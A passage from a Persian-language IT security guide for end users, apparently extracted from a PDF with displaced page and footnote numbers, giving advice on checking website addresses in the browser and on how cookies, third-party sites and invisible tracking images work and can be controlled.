‫ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺷﻤﺎ ﻫﺸﺪﺍﺭ ﺩﻫﻨـﺪ ﻭ‬
‫ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﺍﺯ ﺍﺩﺍﻣﺔ ﻓﻌﺎﻟﻴﺖ ﺑﺎﺯ ﺑﻤﺎﻧﻨﺪ‪ .‬ﺍﮔﺮ ﻣﺎﻳﻞ ﻧﻴﺴﺘﻴﺪ‬
‫ﭼﻨﻴﻦ ﺍﺗﻔﺎﻗﻲ ﺭﺥ ﺩﻫـﺪ‪ ،‬ﻣﺮﻭﺭﮔـﺮ ﺑﺎﻳـﺪ ﺑﺘﻮﺍﻧـﺪ ﻧﻴﺎﺯﻫـﺎﻱ‬
‫ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ ﻛﻨـﺪ ﻭ ﺑـﺮﺍﻱ ‪ download‬ﻭ‬
‫‪Online Services‬‬
‫‪79‬‬
‫ﻗﺎﻧﻮﻥ ﺩﻭﺍﺯﺩﻫﻢ‪:‬‬
‫ﺑﻪ ﺁﺩﺭﺱ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻭ ﺁﺩﺭﺳـﻲ ﻛـﻪ ﺑـﻪ ﺁﻥ ﻣﺘـﺼﻞ‬
‫ﻣﻲﺷﻮﻳﺪ ﺩﻗﺖ ﻛﻨﻴﺪ ﻭ ﻫﻨﮕﺎﻡ ﻣﺸﺎﻫﺪﺓ ﻳـﻚ ﭘﺎﻳﮕـﺎﻩ‬
‫ﻭﺏ ﻧﺎﺷﻨﺎﺧﺘﻪ‪ ،‬ﺑﻪ ﺁﻥ ﺗﻮﺟﻪ ﻧﻤﺎﻳﻴﺪ؛ ﺧﺼﻮﺻ ﹰﺎ ﺍﮔﺮ ﺑـﻪ‬
‫ﺁﻥ ﭘﺎﻳﮕﺎﻩ ﺍﺟﺎﺯﺓ ﺍﺟﺮﺍﻱ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ‬
‫ﺭﺍ ﺩﺍﺩﻩﺍﻳﺪ‪.‬‬
‫ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﻭﺏ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﻃـﻮﺭﻱ ﺗﻨﻈـﻴﻢ ﺷـﻮﻧﺪ ﻛـﻪ ﺁﺩﺭﺱ‬
‫ﻻ‬
‫ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺩﺭﺣﺎﻝ ﻣﺸﺎﻫﺪﻩ ﺭﺍ ﻧﺸﺎﻥ ﺩﻫﻨـﺪ )ﺍﻳـﻦ ﻗﺎﺑﻠﻴـﺖ ﻣﻌﻤـﻮ ﹰ‬
‫‪ Navigation Bar‬ﻳﺎ ‪ Address Bar‬ﻧﺎﻣﻴـﺪﻩ ﻣـﻲﺷـﻮﺩ(‪ .‬ﻫﻨﮕﺎﻣﻴﻜـﻪ‬
‫ﻣﻜﺎﻥﻧﻤﺎﻱ‪ ٨٠‬ﺷﻤﺎ ﺑﻪ ﻳﻚ ﺍﺭﺗﺒﺎﻁ‪ ٨١‬ﺍﺷﺎﺭﻩ ﻣﻲﻛﻨﺪ‪ ،‬ﺍﻳﻦ ﻭﻳﮋﮔـﻲ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﻧﺸﺎﻥ ﺩﻫﺪ ﻛﻪ ﺁﻥ ﺍﺭﺗﺒﺎﻁ ﺑﻪ ﭼـﻪ ﺁﺩﺭﺳـﻲ ﺍﺷـﺎﺭﻩ ﺩﺍﺭﺩ‬
‫)ﻧﻮﺍﺭ ﻭﺿﻌﻴﺖ‪ .(٨٢‬ﺑﺎ ﻣﺸﺎﻫﺪﺓ ﺁﻥ ﺁﺩﺭﺱ ﻣﺘﻮﺟﻪ ﻣﻲﺷـﻮﻳﺪ ﻛـﻪ ﺑـﻪ‬
‫ﭼﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺩﻳﮕﺮﻱ ﻓﺮﺳـﺘﺎﺩﻩ ﺧﻮﺍﻫﻴـﺪ ﺷـﺪ؛ ﭘﺎﻳﮕـﺎﻫﻲ ﻛـﻪ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻏﻴﺮﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﺑﺎﺷﺪ؛ ﻳـﺎ ﺷـﺎﻳﺪ ﻧﺨﻮﺍﻫﻴـﺪ ﺁﻧـﺮﺍ‬
‫ﻣﺸﺎﻫﺪﻩ ﻛﻨﻴﺪ‪ .‬ﺩﺭ ﻋﻤﻞ ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﺨﻮﺍﻫﻴـﺪ ﺑـﺎ ﻫـﺮ ﻛﻠﻴـﻚ‬
‫‪ Navigation Bar‬ﻭ ‪ Status Bar‬ﺭﺍ ﺑﺮﺭﺳـﻲ ﻛﻨﻴـﺪ‪ ،‬ﺍﻣـﺎ‬
‫ﻭﻗﺘﻴﻜﻪ ﺩﺭ ﻳﻚ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﻧﺎﺁﺷـﻨﺎ ﻫـﺴﺘﻴﺪ ‪ -‬ﺑﺨـﺼﻮﺹ ﺍﮔـﺮ‬
‫‪ Java‬ﻳﺎ ‪ ActiveX‬ﺭﺍ ﻓﻌﺎﻝ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ ‪ -‬ﺑﺎﻳﺪ ﺍﺯ ﺍﻳـﻦ ﺍﺑـﺰﺍﺭ‬
‫ﺑﮕﻮﻧﻪﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ ﻛـﻪ ﭼﻨﺎﻧﭽـﻪ ﺑـﺼﻮﺭﺕ ﻧﺎﺧﻮﺍﺳـﺘﻪ ﺑـﻪ‬
‫ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺟﺪﻳﺪﻱ ﻫﺪﺍﻳﺖ ﺷﺪﻳﺪ ﺍﺯ ﺁﻥ ﺁﮔﺎﻫﻲ ﻳﺎﺑﻴﺪ‪.‬‬
‫‪Cookie‬ﻫﺎ‬
‫‪ Cookie‬ﺍﻃﻼﻋﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﻣﺮﻭﺭﮔـﺮ ﻫﻨﮕـﺎﻡ ﻣـﺸﺎﻫﺪﺓ ﻳـﻚ‬
‫ﺏ ﺭﺍﻩ ﺩﻭﺭ ﺭﻭﻱ ﺩﻳــﺴﻚ ﺳــﺨﺖ ﺭﺍﻳﺎﻧــﻪ ﻣــﻲﻧﻮﻳــﺴﺪ‪.‬‬
‫ﭘﺎﻳﮕــﺎﻩ ﻭ ﹺ‬
‫ﻫﻨﮕﺎﻣﻴﻜﻪ ﺑﻌﺪﻫﺎ ﺩﻭﺑﺎﺭﻩ ﻫﻤـﺎﻥ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺭﺍ ﻣـﺸﺎﻫﺪﻩ ﻛﻨﻴـﺪ‪،‬‬
‫‪cookie‬ﻫﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﺷﻤﺎ ﻣﺠﺪﺩﹰﺍ ﺑـﺮﺍﻱ ﺁﻥ ﭘﺎﻳﮕـﺎﻩ ﺍﺭﺳـﺎﻝ‬
‫ﻣﻲﺷﻮﻧﺪ‪ .‬ﺩﺭﻭﺍﻗﻊ ﻫﺮ ‪ cookie‬ﻣﺮﺑﻮﻁ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﺒﺪﺃ ﺧـﻮﺩ‬
‫ﺍﺳﺖ؛ ﺍﮔﺮﭼﻪ ﺑﺮﺧﻲ ﺍﺯ ﺍﺷﻜﺎﻻﺕ ﻣﻮﺟـﻮﺩ ﺩﺭ ﻣﺮﻭﺭﮔﺮﻫـﺎ ﺑﺎﻋـﺚ‬
‫ﻣــﻲﺷــﻮﻧﺪ ﻛــﻪ ﭘﺎﻳﮕﺎﻫﻬــﺎ ﺑﺘﻮﺍﻧﻨــﺪ ‪cookie‬ﻫــﺎﻱ ﻳﻜــﺪﻳﮕﺮ ﺭﺍ‬
‫ﻣﺸﺎﻫﺪﻩ ﻧﻤﺎﻳﻨﺪ‪ Cookie .‬ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﺘﺬﻛﺮ ﻣـﻲﺷـﻮﺩ ﻛـﻪ‬
‫ﻼ ﺩﺭ‬
‫ﺷﻤﺎ ﭼﻪ ﻛﺴﻲ ﻫﺴﺘﻴﺪ‪ ،‬ﻣﻴﻞ ﻭ ﺳﻠﻴﻘﺔ ﺷـﻤﺎ ﭼﻴـﺴﺖ‪ ،‬ﻭ ﻗـﺒ ﹰ‬
‫ﺁﻥ ﭘﺎﻳﮕﺎﻩ ﭼﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻳﻲ ﺍﻧﺠﺎﻡ ﺩﺍﺩﻩﺍﻳﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻫﻨﮕﺎﻣﻴﻜﻪ‬
‫‪Cursor‬‬
‫‪Link‬‬
‫‪Status Bar‬‬
‫‪80‬‬
‫‪81‬‬
‫‪82‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫‪ Download‬ﭘﻮﻳﺎﻱ ﺑﺮﻧﺎﻣﻪﻫﺎ ﮔﺎﻫﻲ ﺍﻭﻗـﺎﺕ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﺴﻴﺎﺭ‬
‫ﻣﻔﻴﺪ ﺑﺎﺷﺪ‪ .‬ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺑﻪ ﺷﻤﺎ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫـﺪ ﻛـﻪ ﺍﺯ ﺧـﺪﻣﺎﺕ‬
‫ﻼ ﺑﻪ ﻭﻳﺮﻭﺱﻳﺎﺑﻲ ﻭ ﺭﻓـﻊ ﻣـﺸﻜﻼﺕ‬
‫ﺑﺮﺧﻂ‪ ٧٩‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ؛ ﻣﺜ ﹰ‬
‫ﺍﻣﻨﻴﺘﻲ ﺑﭙﺮﺩﺍﺯﻳﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﺷـﻤﺎ ﺑﺘﻮﺍﻧـﺪ‬
‫ﺑﺴﺎﺩﮔﻲ ﻧﺼﺐ ﻭ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺷـﻮﺩ؛ ﺑـﺪﻭﻥ ﺍﻳﻨﻜـﻪ ﻻﺯﻡ ﺑﺎﺷـﺪ‬
‫ﻛﺎﺭﺑﺮ ﺭﻭﺍﻟﻬﺎﻱ ﭼﻨﺪﻣﺮﺣﻠﻪﺍﻱ ﭘﻴﭽﻴﺪﻩ ﻭ ﻓﻨﻲ ﺍﻧﺠﺎﻡ ﺩﻫﺪ‪.‬‬
‫ﺍﺟــﺮﺍﻱ ﺑﺮﻧﺎﻣــﺔ ﻣــﻮﺭﺩ ﻧﻴــﺎﺯ ﺟﻬــﺖ ﻣــﺸﺎﻫﺪﺓ ﺻــﺤﻴﺢ‬
‫ﻣﺤﺘﻮﻳﺎﺕ ﺁﻥ ﭘﺎﻳﮕﺎﻩ ﺍﺯ ﺷﻤﺎ ﺳﺆﺍﻝ ﻧﻤﺎﻳﺪ‪.‬‬
‫‪٨٦‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺑﺎ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﻭﺍﺭﺩ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﻲﺷـﻮﻳﺪ‪،‬‬
‫ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺩﺭ ﻳـﻚ ‪ cookie‬ﺑـﺮ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﺔ‬
‫ﻼ ﭘﺲ ﺍﺯ ﻳﻚ ﻫﻔﺘﻪ ﺩﻭﺑﺎﺭﻩ ﺑـﻪ‬
‫ﺷﻤﺎ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﺪ‪ .‬ﻭﻗﺘﻲﻛﻪ ﻣﺜ ﹰ‬
‫ﺁﻥ ﻣﺮﺍﺟﻌﻪ ﻣﻲﻛﻨﻴﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮ ﺍﺳﺎﺱ ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟﻮﺩ ﺩﺭ‬
‫‪ cookie‬ﻣــﺬﻛﻮﺭ ﺑــﺼﻮﺭﺕ ﺧﻮﺩﻛــﺎﺭ ﻭﺍﺭﺩ ﺁﻥ ﭘﺎﻳﮕــﺎﻩ ﺷــﻮﻳﺪ‪.‬‬
‫‪Cookie‬ﻫﺎ ﻫﻤﭽﻨﻴﻦ ﺑﻪ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﻨﺪ ﺁﻧﭽـﻪ‬
‫ﺭﺍ ﻛﻪ ﺩﺭ ﻳﻚ ﺟﻠﺴﻪ‪ ٨٣‬ﺍﻧﺠﺎﻡ ﺩﺍﺩﻩﺍﻳﺪ ﺭﺩﻳﺎﺑﻲ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺍﮔﺮﭼﻪ ﻳﻚ ‪ cookie‬ﺑﻪ ﺷﻜﻞ ﻣﻌﻤﻮﻝ ﺗﻨﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﭘﺎﻳﮕـﺎﻩ‬
‫ﻭﺏ ﻣﺒﺪﺃ ﺧﻮﺩ ﺑﺎﺯﻳﺎﺑﻲ ﺷﻮﺩ‪ ،‬ﺍﻣﺎ ﻣﻤﻜﻦ ﺍﺳـﺖ ﭘﺎﻳﮕـﺎﻩ ﻭﺑـﻲ ﻛـﻪ‬
‫ﻣﺸﺎﻫﺪﻩ ﻣﻲﻛﻨﻴﺪ ﺣﺎﻭﻱ ﺗـﺼﺎﻭﻳﺮ ﻭ ﺍﺷـﻴﺎﺀ ﺩﻳﮕـﺮﻱ ﺑﺎﺷـﺪ ﻛـﻪ‬
‫‪٨٤‬‬
‫ﻣﺮﺑﻮﻁ ﺑﻪ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺛﺎﻧﻮﻳﻪ ﻫﺴﺘﻨﺪ )ﻛﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺧـﺎﺭﺟﻲ‬
‫ﻳﺎ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺷﺨﺺ ﺛﺎﻟﺚ‪ ٨٥‬ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷـﻮﺩ( ﻭ ﺁﻥ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺛﺎﻧﻮﻳـﻪ‬
‫ﻧﻴﺰ ﺑﺘﻮﺍﻧﺪ ‪cookie‬ﻫﺎ ﺭﺍ ﺫﺧﻴﺮﻩ ﻭ ﺑﺎﺯﻳـﺎﺑﻲ ﻧﻤﺎﻳـﺪ‪ .‬ﺍﺯ ﺁﻧﺠـﺎ ﻛـﻪ‬
‫ﻼ ﻣﺘﻮﺟـﻪ‬
‫ﺗﺼﺎﻭﻳﺮ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻧﺎﻣﺮﺋﻲ ﺑﺎﺷـﻨﺪ‪ ،‬ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺍﺻـ ﹰ‬
‫ﻧﺸﻮﻳﺪ ﻛﻪ ﭼﻨﻴﻦ ﺍﺗﻔﺎﻗﻲ ﺭﺥ ﺩﺍﺩﻩ ﺍﺳﺖ‪ .‬ﺍﻳـﻦ ﺗـﺼﺎﻭﻳ ﹺﺮ ﻏﻴﺮﻗﺎﺑـﻞ‬
‫ﺭﺅﻳﺖ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﺭﺩﻳﺎﺑﻲ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﻭﺑـﻲ ﻛـﻪ ﺷـﻤﺎ ﺁﻧﻬـﺎ ﺭﺍ‬
‫‪٨٦‬‬
‫ﻣﺸﺎﻫﺪﻩ ﻣﻲﻛﻨﻴﺪ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻑ ﺗﺒﻠﻴﻐﺎﺗﻲ ﺑﻜﺎﺭ ﺭﻭﻧﺪ‪.‬‬
‫ﻗﺎﻧﻮﻥ ﺳﻴﺰﺩﻫﻢ‬
‫ﭼﮕﻮﻧﮕﻲ ﻭﺿﻌﻴﺖ ﺫﺧﻴﺮﺓ ‪cookie‬ﻫﺎ ﺑﺮ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﻪ‬
‫ﺭﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪ .‬ﺍﮔﺮ ﻧﻤﻲ ﺗﻮﺍﻧﻴـﺪ ﺁﻧﻬـﺎ ﺭﺍ‬
‫ﻛﻨﺘﺮﻝ ﻧﻤﺎﻳﻴﺪ )ﻣﺎﻧﻨﺪ ﺯﻣﺎﻧﻴﻜـﻪ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺩﺭ ﻳـﻚ ﻣﻜـﺎﻥ‬
‫ﻋﻤﻮﻣﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴـﺪ( ﺍﻃﻼﻋﺎﺕ ﺧـﺼﻮﺻﻲ ﺧـﻮﺩ ﺭﺍ‬
‫ﻭﺍﺭﺩ ﺭﺍﻳﺎﻧﻪ ﻧﻜﻨﻴﺪ‪.‬‬
‫ﻛﻠﻴﺔ ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﻭﺏ ﺗﺎ ﺳﻄﺢ ﻛﻨﺘﺮﻝ ﺧﺎﺻﻲ ﺑﻪ ﺷـﻤﺎ ﺍﻣﻜـﺎﻥ‬
‫ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﻭﺟﻮﺩ ‪cookie‬ﻫﺎ ﺭﺍ ﻣﺠﺎﺯ ﺑﺪﺍﻧﻴﺪ ﻳﺎ ﺧﻴﺮ‪ .‬ﺩﺭ ﺑﺮﺧﻲ‬
‫ﻣﻮﺍﺭﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺮﻭﺭﮔﺮ ﻣﻴﺎﻥ ‪cookie‬ﻫﺎﻳﻲ ﻛـﻪ ﺩﺭ ﺭﺍﻳﺎﻧـﺔ‬
‫ﺷﻤﺎ ﺫﺧﻴﺮﻩ ﺷﺪﻩ ﺍﻧﺪ‪cookie ،‬ﻫﺎﻳﻲ ﻛﻪ ﻫﻨﮕﺎﻡ ﺑـﺴﺘﻦ ﻣﺮﻭﺭﮔـﺮ‬
‫ﻧﺎﭘﺪﻳﺪ ﻣﻲﺷﻮﻧﺪ ﻭ ﺁﻧﺪﺳﺘﻪ ﻛﻪ ﻫﻨﮕﺎﻡ ﻣﺸﺎﻫﺪﺓ ﭘﺎﻳﮕﺎﻩﻫﺎﻱ ﻭﺏ ﻭ‬
‫‪Session‬‬
‫‪Foreign Site‬‬
‫‪Third-Party Site‬‬
‫‪۸۶‬‬
‫ﻓﺮﺽ ﻛﻨﻴﺪ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ‪ A‬ﻭ ‪ B‬ﻭ ‪ C‬ﻭ ‪ D‬ﻫﻤﮕﻲ ﻳﻚ ﺗﺼﻮﻳﺮ ﻧﺎﻣﺮﺋﻲ‬
‫ﺍﺯ ﭘﺎﻳﮕﺎﻩ ‪ Z‬ﻧﻤﺎﻳﺶ ﻣﻲﺩﻫﻨﺪ‪ .‬ﻭﻗﺘﻲ ﺗﺼﻮﻳﺮ ﻣﺮﺑﻮﻃﻪ ﺩﺭ ﻣﺮﻭﺭﮔﺮ ﺷﻤﺎ ﺑﻪ‬
‫ﻧﻤﺎﻳﺶ ﺩﺭ ﻣﻲﺁﻳﺪ‪ Z ،‬ﻣﻄﻠﻊ ﻣﻲﺷﻮﺩ ﻛﻪ ﺍﺯ ﻛﺪﺍﻡ ﭘﺎﻳﮕﺎﻩ ﺑـﻪ ﺁﻥ ﺍﺷـﺎﺭﻩ‬
‫ﺷﺪﻩ ﺍﺳﺖ‪ ،‬ﻭ ﺳﭙﺲ ‪cookie‬ﻫﺎﻳﻲ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﺪ ﺗﺎ ﺑﻪ ﺧﺎﻃﺮ ﺑﺴﭙﺎﺭﺩ‬
‫ﻛﻪ ﺷﻤﺎ ﺍﺯ ﻛﺪﺍﻡ ﭘﺎﻳﮕﺎﻫﻬﺎ ﺩﻳﺪﻥ ﻛﺮﺩﻩ ﺑﻮﺩﻳﺪ‪ .‬ﺍﺯ ﺍﻳﻦ ﭘـﺲ ‪ Z‬ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﺍﻳﻨﻜﻪ ﭼﻪ ﭼﻴﺰﻫﺎﻳﻲ ﻣﻮﺭﺩ ﻋﻼﻗﺔ ﺷﻤﺎ ﺍﺳﺖ ﺍﻃﻼﻋﺎﺕ ﺧﻮﺑﻲ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ‬
‫ﺩﺍﺭﺩ ﻭ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ ﺍﺭﺳﺎﻝ ﺗﺒﻠﻴﻐﺎﺕ ﺑﻪ ﺷﻤﺎ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻛﻨﺪ‪.‬‬
‫‪83‬‬
‫‪84‬‬
‫‪85‬‬
‫ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺧﺎﺭﺟﻲ ﺫﺧﻴﺮﻩ ﻣﻲﮔﺮﺩﻧـﺪ ﺗﻔـﺎﻭﺕ ﻗﺎﺋـﻞ ﺷـﻮﺩ‪.‬‬
‫ﺍﺳﺎﺳﹰﺎ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺟﺎﺯﺓ ﺫﺧﻴﺮﺓ ﻫﻤﺔ ‪cookie‬ﻫﺎ ﺭﺍ ﺑﺪﻫﻴﺪ‪ ،‬ﺍﺯ‬
‫ﺫﺧﻴﺮﺓ ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﻴﺪ‪ ،‬ﻭ ﻳﺎ ﺍﺯ ﻣﺮﻭﺭﮔﺮ ﺑﺨﻮﺍﻫﻴﺪ ﻛﻪ ﻗﺒﻞ ﺍﺯ‬
‫ﺫﺧﻴﺮﺓ ﺁﻧﻬﺎ ﺍﺯ ﺷﻤﺎ ﺳﺆﺍﻝ ﻧﻤﺎﻳﺪ‪ .‬ﺷﻤﺎ ﻫﺮﮔﺰ ﻣﻄﻠﻊ ﻧﻤﻲﺷﻮﻳﺪ ﻛﻪ‬
‫ﭼﻪ ﺯﻣﺎﻧﻲ ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩ ﺷﺪﻩ ﺩﺭ ﻳـﻚ ‪ cookie‬ﺑـﻪ ﭘﺎﻳﮕـﺎﻩ‬
‫ﻭﺏ ﻣﺒﺪﺃ ﺑﺎﺯﻣﻲﮔﺮﺩﺩ‪.‬‬
‫‪Cookie‬ﻫﺎ ﺭﺍ ﻣﻲﺗـﻮﺍﻥ ﺑﺮﺭﺳـﻲ ﻧﻤـﻮﺩ ﺯﻳـﺮﺍ ﺩﺭ ﻗﺎﻟـﺐ ﻣﺘﻨـﻲ‬
‫ﻫﺴﺘﻨﺪ‪ ،‬ﺍﻣﺎ ﭼﻮﻥ ﺍﻃﻼﻋـﺎﺕ ﻣﻮﺟـﻮﺩ ﺩﺭ ﺁﻥ ﺗﻮﺳـﻂ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ‬
‫ﻻ ﻗﺎﺑﻞ ﻓﻬﻢ ﻧﻤﻲﺑﺎﺷﻨﺪ‪ .‬ﺑﺮﺧﻲ ﺍﺯ‬
‫ﻣﺒﺪﺃ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﺩ ﻣﻌﻤﻮ ﹰ‬
‫ﻣﺮﻭﺭﮔﺮﻫﺎ ﺍﺟﺎﺯﺓ ﻧﻤﺎﻳﺶ ﻭ ﺣـﺬﻑ ‪cookie‬ﻫـﺎ ﺭﺍ ﻣـﻲﺩﻫﻨـﺪ ﻭ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺛﺎﻟﺜﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛـﻪ ﺍﺟـﺎﺯﺓ ﻣـﺪﻳﺮﻳﺖ ﺁﻧﻬـﺎ ﺭﺍ ﻧﻴـﺰ‬
‫ﺑﺮﺍﻱ ﺷﻤﺎ ﻓﺮﺍﻫﻢ ﻣﻲﺁﻭﺭﻧﺪ‪.‬‬
‫ﺍﮔﺮ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﻳـﻚ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺩﺭ ﻣـﻮﺭﺩ ﺷـﻤﺎ‬
‫ﻣﻲ ﺩﺍﻧﺪ ﺭﺍ ﻛﻨﺘﺮﻝ ﻛﻨﻴﺪ ﺑﺎﻳـﺪ ﺯﻣـﺎﻥ ﻭ ﭼﮕـﻮﻧﮕﻲ ﺫﺧﻴـﺮﻩﺷـﺪﻥ‬
‫‪cookie‬ﻫﺎ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ﻛﻨﺘـﺮﻝ ﻧﻤﺎﻳﻴـﺪ‪ .‬ﺗﻮﺟـﻪ ﺩﺍﺷـﺘﻪ‬
‫ﺑﺎﺷﻴﺪ ﻛﻪ ﺑﺮﺧﻲ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺑﺪﺭﺳﺘﻲ‬
‫ﻋﻤﻞ ﻧﻤﺎﻳﻨﺪ ﻧﻴﺎﺯﻣﻨـﺪ ﺫﺧﻴـﺮﺓ ‪cookie‬ﻫـﺎ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﺔ ﻛـﺎﺭﺑﺮ‬
‫ﻣﻲﺑﺎﺷﻨﺪ‪ .‬ﻋﻤﻮﻣﹰﺎ ﺍﻳﻦ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺩﺭﺻﻮﺭﺕ ﻏﻴﺮﻓﻌﺎﻝ ﺑﻮﺩﻥ‬
‫‪cookie‬ﻫﺎ ﺑﻪ ﺷﻤﺎ ﺍﻃﻼﻉ ﻣﻲﺩﻫﻨـﺪ ﻛـﻪ ﻗـﺎﺩﺭ ﺑـﻪ ﺍﻧﺠـﺎﻡ ﻳـﺎ‬
‫ﺗﻜﻤﻴﻞ ﻋﻤﻠﻴﺎﺕ ﻧﻴﺴﺘﻨﺪ‪.‬‬
‫ﺍﮔﺮ ﺩﺭ ﺍﻣﺎﻛﻦ ﻋﻤـﻮﻣﻲ )ﻣﺜـﻞ ﻛـﺎﻓﻲﻧـﺖ‪ ،‬ﻛﺘﺎﺑﺨﺎﻧـﻪﻫـﺎ‪ ،‬ﻣـﺪﺍﺭﺱ( ﺍﺯ‬
‫ﻣﺮﻭﺭﮔﺮﻫــﺎﻱ ﻭﺏ ﺍﺳــﺘﻔﺎﺩﻩ ﻣــﻲﻛﻨﻴــﺪ ﺗﻮﺟــﻪ ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻴﺪ‬
‫‪cookie‬ﻫﺎﻳﻲ ﻛﻪ ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ ﻫﺴﺘﻨﺪ ﺩﺭ ﺁﻧﻬﺎ ﺫﺧﻴـﺮﻩ‬
‫ﻣﻲﺷﻮﻧﺪ‪ .‬ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﺭﺍﻫﺒﺮ ﺭﺍﻳﺎﻧﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺷﻤﺎ‬
‫ﺁﻧﻘﺪﺭ ﺩﺳﺘﺮﺳﻲ ﻧﺪﺍﺩﻩ ﺑﺎﺷﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻴـﺪ ‪cookie‬ﻫـﺎ ﺭﺍ ﻛﻨﺘـﺮﻝ‪،‬‬
